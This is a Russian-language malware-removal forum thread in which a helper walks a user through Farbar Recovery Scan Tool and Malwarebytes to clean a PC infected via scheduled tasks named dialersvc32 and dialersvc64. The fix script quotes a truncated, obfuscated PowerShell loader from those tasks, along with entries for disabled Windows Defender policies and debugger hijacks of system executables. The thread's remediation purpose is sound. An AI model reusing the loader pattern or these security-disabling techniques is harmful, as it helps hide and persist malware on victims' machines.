yenagry 0 Опубликовано 16 февраля Share Опубликовано 16 февраля (изменено) Здравствуйте, компьютер стал странно себя вести, проверил на вирусы и нашел эти два dialersvc32.job и dialersvc64.job, они не удаляются Изменено 16 февраля пользователем yenagry Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 051 Опубликовано 16 февраля Share Опубликовано 16 февраля Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи». Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля Здравствуйте, компьютер стал странно себя вести, проверил на вирусы и нашел эти два dialersvc32.job и dialersvc64.job, они не удаляютсяCollectionLog-2023.02.16-09.42.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Здравствуйте! Дополнительно, пожалуйста: Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Да для соглашения с предупреждением. Нажмите кнопку Сканировать (Scan). После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Новую тему создавать не нужно, продолжаем здесь. Цитата Ссылка на сообщение Поделиться на другие сайты
kmscom 2 125 Опубликовано 16 февраля Share Опубликовано 16 февраля Сообщение от модератора kmscom Темы объединены 1 Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля 1 час назад, Sandor сказал: Здравствуйте! Дополнительно, пожалуйста: Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Да для соглашения с предупреждением. Нажмите кнопку Сканировать (Scan). После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Новую тему создавать не нужно, продолжаем здесь. Addition.txtFRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Не нужно полностью цитировать предыдущее сообщение, это ухудшает читаемость темы. Пишите в нижнем поле быстрого ответа. Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены. Отключите до перезагрузки антивирус. Закройте все запущенные программы. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Ограничение <==== ВНИМАНИЕ IFEO\CompatTelRunner.exe: [Debugger] %windir%\System32\taskkill.exe IFEO\DeviceCensus.exe: [Debugger] %windir%\system32\taskkill.exe HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ Task: {490718A0-CB7B-4CB6-975D-D8313537F963} - System32\Tasks\GoogleUpdateTaskMachineQC => C:\Program Files\Google\Chrome\updater.exe (Доступ не разрешён) <==== ВНИМАНИЕ <==== ВНИМАНИЕ Task: {6DE4F610-E924-4368-9C92-302F4D74F2B8} - System32\Tasks\dialersvc64 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ Task: {89EDDD67-6844-49EF-866C-3763A0D1CF54} - System32\Tasks\dialersvc32 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ HKU\S-1-5-21-1254346534-2192647422-3779847561-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ FirewallRules: [{20DEA858-06DB-4463-A361-80A4E328AE3E}] => (Allow) LPort=1688 ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Хорошо. Дополнительно, пожалуйста: Скачайте Malwarebytes v.4 (или с зеркала). Установите и запустите. (На предложение активации лицензии ответьте "Позже" и "Использовать бесплатную версию"). Запустите Проверку и дождитесь её окончания.Самостоятельно ничего не помещайте в карантин!!! Нажмите кнопку "Сохранить результаты - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan". Отчёт прикрепите к сообщению. Подробнее читайте в руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля первая ссылка не работает, с зеркала скачал архив, распаковал и запустил приложение, там выдало такие ошибки Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Вероятно вы пытаетесь запустить прямо из архива, что неверно. Извлеките исполняемый файл из архива и только потом запускайте. (Только что проверил, скачивается и извлекается успешно). Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля Scan.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Всё, что найдено (кроме вашего активатора) удалите (поместите в карантин). Перезагрузите компьютер и повторите ещё раз сканирование. Новый лог покажите. Цитата Ссылка на сообщение Поделиться на другие сайты
yenagry 0 Опубликовано 16 февраля Автор Share Опубликовано 16 февраля Извините, не понимаю, что из них является моим активатором? Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 129 Опубликовано 16 февраля Share Опубликовано 16 февраля Последние две строки. Если вы его не устанавливали самостоятельно, тоже удалите. Цитата Ссылка на сообщение Поделиться на другие сайты
От 2xCh4k
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.